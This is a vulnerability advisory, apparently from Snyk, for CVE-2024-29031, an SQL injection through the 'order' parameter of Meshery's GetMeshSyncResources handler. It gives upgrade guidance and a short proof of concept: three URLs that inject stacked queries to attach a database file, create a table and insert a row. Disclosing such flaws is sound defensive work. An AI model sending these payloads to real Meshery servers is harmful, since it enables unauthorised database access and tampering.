SQL Injection Affecting github.com/layer5io/meshery/server/handlers package, versions <0.7.17
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (17th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-GITHUBCOMLAYER5IOMESHERYSERVERHANDLERS-6481146
- published 22 Mar 2024
- disclosed 21 Mar 2024
- credit Tony Torralba
Introduced: 21 Mar 2024
CVE-2024-29031 Open this link in a new tabHow to fix?
Upgrade github.com/layer5io/meshery/server/handlers
to version 0.7.17 or higher.
Overview
github.com/layer5io/meshery/server/handlers is a collection of handlers (aka "HTTP middleware") for Meshery
Affected versions of this package are vulnerable to SQL Injection due to the order
parameter of GetMeshSyncResources
. An attacker can obtain sensitive information by manipulating the input to the order
parameter.
PoC
http://(server):9081/api/system/meshsync/resources?order=1%3bATTACH+DATABASE+'/tmp/test'+AS+test--
http://(server):9081/api/system/meshsync/resources?order=1%3bCREATE+TABLE+test.pwn+(dataz+text)--
http://(server):9081/api/system/meshsync/resources?order=1%3bINSERT+INTO+test.pwn+(dataz)+VALUES+("pwned")--
References
CVSS Scores
version 3.1